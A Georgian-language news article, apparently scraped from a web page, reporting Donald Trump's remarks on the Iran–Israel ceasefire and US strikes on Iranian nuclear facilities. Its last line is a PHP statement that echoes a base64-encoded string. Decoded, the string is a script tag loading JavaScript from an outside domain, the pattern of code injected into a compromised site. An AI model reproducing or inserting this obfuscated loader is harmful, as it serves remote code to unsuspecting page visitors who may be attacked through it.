gorgia
გარე ავეჯი

აშშ-ის პრეზიდენტი დონალდ ტრამპი აცხადებს, რომ ირანსა და ისრაელს შორის ცეცხლის შეწყვეტის რეჟიმი „ძალიან კარგად“ მიმდინარეობს. მან მადლობა გადაუხადა ისრაელის პრემიერ-მინისტრს, რომელმაც სიჩუმის რეჟიმის ამოქმედების შემდეგ ირანის პოზიციების დასაბომბად გაგზავნილი ავიაგამანადგურებლები, ტრამპის თხოვნით, უკან დააბრუნა.

დონალდ ტრამპის თქმით, მას შემდეგ, რაც აშშ-მა გამანადგურებელი დატყმები მიიტანა ირანის ბირთვულ ობიექტებზე, ირანი ახლა ურანის გამდიდრებაზე ორიენტირებული ვეღარ იქნება.

„ჩვენ გარკვეული ურთიერთობები გვექნება ირანთან. მე მქონდა ეს ურთიერთობა ბოლო ოთხი დღის განმავლობაში. ისინი დათანხმდნენ ცეცხლის შეწყვეტას და ეს ძალიან თანასწორი შეთანხმება იყო. ორივემ თქვა – საკმარისია. ურანის გამდიდრება ყველაზე ბოლოა, რაც ახლა მათ შეიძლება სურდეთ“, – განაცხადა ტრამპმა.

აშშ-ის პრეზიდენტის თქმით, ირანი ასევე ვერ შეძლებდა ურანის მარაგების გატანას, რადგან ეს საკმაოდ რთული და სახიფათო პროცესია, ამერიკამ კი სწრაფად იმოქმედა და წინასწარ გააფრთხილა ისინი, შესაბამისად, როდესაც დარტყმები განახორციელა, იქ ყველაფერი განადგურდა.

მისივე თქმით, ავიადარტყმების შემდეგ ირანელებმა ტერიტორია დაათვალიერეს და განაცხადეს, რომ ის სრულად განადგურებულია.

„ჩვენ რომ ეს არ გაგვეკეთებინა, მათ ძალიან დიდი შეიარაღება ექნებოდათ გასაგრძელებლად. ორი ირანელი ჩავიდა იქ შესამოწმებლად და თქვეს, რომ ეს ადგილი აღარ არსებობს. შიგნით ყველაფერი დანგრეულია. ვერავინ შედის, რადგან დანგრეულია. 10 მილიონი ტონა ბეტონი ადევს. გვირაბები ჩამონგრეულია“, – აღნიშნა ტრამპმა.

დონალდ ტრამპი მიიჩნევს, რომ ათწლეულებით უკან დაიხია ირანის ბირთვულმა პროგრამამ.

„ამ დარტყმამ დაასრულა ომი. არ მინდა, ჰიროსიმასა და ნაგასაკის მაგალითი გამოვიყენო, მაგრამ სწორედ ამან განაპირობა ომის დასრულება. ეს რომ არ გაგვეკეთებინა, ახლა ჯერ კიდევ ბრძოლაში იქნებოდნენ“, – დასძინა ტრამპმა.

124
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");